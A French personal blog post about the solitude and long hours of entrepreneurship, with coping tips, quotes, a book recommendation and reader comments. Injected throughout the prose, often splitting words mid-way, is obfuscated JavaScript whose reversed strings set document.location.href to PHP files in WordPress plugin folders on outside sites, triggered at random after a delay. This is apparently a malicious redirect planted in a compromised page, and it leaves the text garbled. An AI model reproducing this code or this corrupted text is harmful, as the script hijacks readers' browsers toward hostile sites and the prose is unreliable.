
« Choisir c’est renoncer »
Faire le choix d’entreprendre m’a exigé de renoncer à une grande partie de ma vie sociale.
Beaucoup de gens ont l’impression que les entrepreneurs disposent de plus de temps pour eux. Je viens juste vous dire que c’est faux. Ce dont on dispose, à terme, c’est du loisir d’aménager notre travail sur les 24 heures dont nous disposons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous, employés, entrepreneurs et chômeurs. Nous avons 24 heures. Alors avec ces 24 heures, je me débrouille au mieux mais je déborde toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout le temps. Il a fallu que mes proches passent par la période des reproches; je pouvais les entendre me dire des phrases du genre : « Nancy, tu travailles trop » ou encore « Tu devrais prendre un peu de temps pour toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toi ». Au début, j’étais frustrée, dépassée et attristée de ne pas être comprise.
Ensuite, j’ai eu des remords si fort que ça m’en donnait mal au ventre, rien que d’y penser.
Coincée entre plusieurs dilemmes, j’ai chaque fois dû me trouver des raisons parce que j’avais l’impression d’être une mauvaise mère, une mauvaise femme, une mauvaise amie, une mauvaise soeur, une mauvaise fille. Bref, ce sentiment, ce remord ne vous lâche pas. Du moins, pas jusqu’à ce que vous puissiez faire la paix avec ces heures de travail loin de vos proches et amis, non pas parce que vous ne les aimez plus, mais parce que ces heures sont nécessaires pour délivrer quelque chose de bon. Parce que ça prend du temps de maîtriser son domaine d’activité.

L’équilibre n’est pas une meilleure gestion du temps mais une meilleure gestion des limites.
– Betsy Jacobson
$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor is-style-dots »/>
Alors que faites-vous de cette solitude nécessaire ?
Je crois que j’écris cet article car je me rends compte que le travail m’absorbe tellement que je ne prends plus le temps pour blogger, hors j’adore ça. J’adore mettre de la musique et me recentrer en partageant un peu de moi. Et vous ? Qu’est-ce que vous détend ?
Je vous parle de ça pour rebondir sur la citation de Betsy Jacobson que je viens de partager plus haut, elle ne s’attaque pas à notre gestion du temps mais à notre gestion des limites. Nous avons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous 24 heures mais nous n’avons pas les mêmes limites, certains sont du matin, d’autres sont du soir. Certains sont dans un environnement propice au travail, d’autres ont des enfants à gérer et un boulot à côté… Au début, je travaillais tellement que j’atteignais mes limites chaque fois. Et vous voulez savoir ce qui arrivait alors ? j’étais à bout de nerfs, je pouvais pleurer à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout moment et pour n’importe quoi. Aussi, j’avais constamment peur de ne pas y arriver. Il m’arrivait même de pleurer car j’avais beaucoup trop de travail et dire qu’aujourd’hui, je fais 3 fois plus…
Le manque de sommeil, le fait de passer d’un problème à un autre, d’un projet à un autre, d’un client à un autre,… ça peut rendre fou si on ne prend pas le temps de comprendre ses limites et de s’aménager un peu. Même la solitude a ses limites. C’est vrai que certains types de tâches demandent de la préparation, du silence et de l’énergie. En toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout cas, moi j’ai trouvé beaucoup de plaisir à être seule et à aller chercher au fond de moi des éléments que je devrais mettre en lumière. Et si la solitude n’était qu’un instant de pure connexion à La Source d’Inspiration et de créativité universelle ? Ahaha le genre de phrase philosophique que vous ne pouvez sortir que seul. Sans aucun regard penché sur vous.
Difficile ne veut pas dire impossible; cela veut seulement dire qu’il faut travailler davantage.
Comment relativiser et éviter de déprimer à cause de l’isolation ?
Je n’ai pas la science infuse, je vous parle de ce qui marche pour moi. J’aimerai en savoir plus sur vos astuces, n’hésitez donc pas à m’écrire. Même en utilisant le bot, je serai là directement.
- Le bureau virtuel avec ma business partner Emilie Lubukayi : même si nous ne faisons pas la même chose, nous avons l’habitude de prendre des rendez-vous dans notre bureau virtuel sur Google Meet ou sur Zoom. Pendant environ 3 à 7 heures de travail, elle s’occupe de ses tâches et moi des miennes. Il nous arrive aussi de nous poser des questions sur ce qui nous occupe ou de nous entraider…
- Motiver d’autres personnes : Prendre le temps d’envoyer de la force à d’autres entrepreneurs soit en leur offrant de notre temps, soit en proposant nos services gratuitement pour sortir la tête du guidon et faire autre chose. Cela peut aussi être une source d’inspiration, et puis, il faut être entoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touré, ne pas vous coupez du monde et ne laissez pas le travail absorber toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute votre énergie. C’est plus facile à dire qu’à faire… je le reconnais.
- J’ai recommencé à écrire : je trouve que l’écriture me permet de sortir de moi en quelque sorte et de me regarder, m’analyser pour mieux me comprendre. Sinon, je traverse des moments de doute sans comprendre ce qui cause ces doutes ou des moments de démotivation. L’écriture me permet d’aller puiser au fond de moi, la raison pour laquelle j’ai fait les choix qui me mènent là où je suis aujourd’hui.
- Planification : Quand je commence ma journée sans faire un plan ou quand je travaille sans suivre mon plan c’est que je ne serais pas productive. Je peux travailler 7 heures avec une efficacité de 2/10 ou travailler 4 heures avec une efficacité optimisée. J’ai pris du temps à le réaliser mais je suis le genre de personne qui a besoin de targets. Je dois connaître l’objectif de ma journée.
La solitude est aussi nécessaire au développement et à l’épanouissement de notre âme que le sommeil et la nourriture le sont à la survie de notre corps.
Sarah Breathnach
L’une des choses que nous sommes forcés de comprendre assez vite c’est qu’on ne peut pas être partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout le temps sinon on ne sera nul part. Cette leçon sera accueillie comme une privation de liberté si votre objectif ne vous met pas en danger. Ce que je veux dire par là, si cela ne vous impacte aucunement de travailler ou pas, vous n’aurez pas suffisamment de motivation pour travailler. Mais si travailler vous garantit de pouvoir subvenir aux besoins de votre famille, vous irez travailler. Vous trouverez de l’énergie ou vous vous créerez une raison.
Jongler entre sa vie d’entrepreneur et sa vie privée
Je n’ai même pas parlé des moments volés à notre vie privée pour disposer de plus de temps pour nos activités. Je ne m’y étalerai pas aujourd’hui. Promis.
Ceux qui rêvent d’entreprendre doivent quand même être préparés à cette réalité; c’est difficile mais cela ne veut pas dire que c’est impossible. Rien ne sert de se mentir. Dire que c’est facile serait un mensonge sans nom. On peut emménager notre temps comme on le veut mais la réalité et nos engagements nous rattrapent toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours. Je n’ai pas les secrets pour relativiser, je suis juste une femme passionnée qui a la rage de vivre et qui trime avec la réalité de la vie qu’elle a choisi.
Certes, entreprendre c’est accepter qu’on peut avoir des moments de solitude mais notre façon de gérer nos limites peut alléger certains moments plus difficiles à supporter. Aussi, rappelez-vous que vous n’êtes pas seuls, entoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourez-vous de personnes qui font la même chose que vous et qui peuvent vous aider, vous éclairer et vous inspirer. Il est vrai que ce n’est pas parce qu’on entreprend qu’on ne doit plus avoir de vie. C’est déjà assez compliqué de gérer sa vie privé et la vie professionnelle d’un entrepreneur n’est pas un long fleuve tranquille… soyons-en conscients car ça nous permet de comprendre nos proches et de leur parler, leur expliquer ce que l’on fait et pourquoi ça prend autant de ce précieux temps que vous avez à leur donner. Vous vous sentirez plus léger !
Je vous laisse sur ces mots, je vais continuer à écouter mon fond de musique et le Koob que je ne cesse de mettre en boucle en travaillant. Au plaisir de vous revoir sur mon blog !
MON PETIT CONSEIL « ANTIDÉPRESSEUR »& MOTIVATION

Comme déculpabilisant, une fois j’ai écouté un Koob qui pourrait faire vos beaux jours : il vous conseille de penser 10X plus grand et agir 10X plus grand. Car cela représente le moyen le plus sûr de réaliser vos rêves et vos objectifs.
Vous apprendrez aussi :
- pourquoi les gens normaux échouent ;
- comment ne pas gâcher votre potentiel ;
- comment décupler votre motivation ;
- comment déterminer des objectifs efficaces ;
- que le succès est un état d’esprit ;
- comment dominer la concurrence.
JE VOUS LE RECOMMANDE VRAIMENT !
Le livre est également disponible sur amazon en français en cliquant $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to/3rf8eGF »>ici
Alors il est temps d’apprendre à déléguer 😉 Pas facile quand on possède la source d’inspiration et qu’on est perfectionniste mais tu peux y penser pour certaines tâches. 😘
Oui, déléguer c’est la prochaine étape pour ne pas suffoquer. merci Sophie, t’es un ange 🙂
Merci pour ce partage ce travail